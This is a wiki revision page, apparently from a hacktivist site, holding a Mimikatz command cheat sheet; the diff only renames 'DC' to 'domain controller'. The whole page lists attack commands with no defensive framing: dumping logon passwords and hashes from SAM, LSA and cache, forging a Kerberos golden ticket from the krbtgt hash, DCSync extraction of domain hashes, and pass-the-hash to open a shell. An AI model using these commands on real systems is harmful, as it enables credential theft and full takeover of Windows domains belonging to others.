Mimikatz: Difference between revisions

From Enlace Hacktivista
Line 10: Line 10:
* sekurlsa::ekeys
* sekurlsa::ekeys


=== Create a golden ticket on DC ===
=== Create a golden ticket on the domain controller ===
* privilege::debug
* privilege::debug
* lsadump::lsa /inject /name:krbtgt
* lsadump::lsa /inject /name:krbtgt

Revision as of 22:16, 24 June 2023

Steal creds

  • privilege::debug
  • sekurlsa::logonpasswords

Dump Hashes

  • token::elevate
  • lsadump::sam
  • lsadump::lsa /patch
  • lsadump::lsa /inject
  • lsadump::cache
  • sekurlsa::ekeys

Create a golden ticket on the domain controller

  • privilege::debug
  • lsadump::lsa /inject /name:krbtgt
  • kerberos::golden /user:<USER> /domain:<DOMAIN.LOCAL> /sid:<SID> /krbtgt:<KRBTGT> /id:<ID>
  • misc::cmd

Retrieve the password hashes of user accounts from a domain controller

  • lsadump::dcsync /user:<USER>

Pass the Hash

  • sekurlsa::pth /user:<USER> /domain:<DOMAIN.LOCAL> /ntlm:<HASH> /run:cmd